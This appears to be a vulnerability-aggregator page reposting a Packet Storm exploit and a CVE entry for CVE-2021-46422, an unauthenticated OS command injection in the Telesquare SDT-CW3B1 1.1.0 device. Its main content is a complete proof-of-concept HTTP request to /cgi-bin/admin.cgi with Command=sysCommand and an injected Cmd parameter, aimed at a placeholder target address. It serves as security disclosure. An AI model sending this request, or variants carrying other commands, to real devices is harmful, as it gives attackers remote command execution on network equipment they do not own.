Headline

SDT-CW3B1 1.1.0 Command Injection

SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

2 years ago

#vulnerability #web #windows #apple #auth #chrome #webkit

# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close

Telesquare SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

2 years ago

Packet Storm

Open in Source

#vulnerability #auth

CVE-2021-46422: SDT-CW3B1 – Google Disk

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

2 years ago

CVE

Open in Source

#vulnerability #google #auth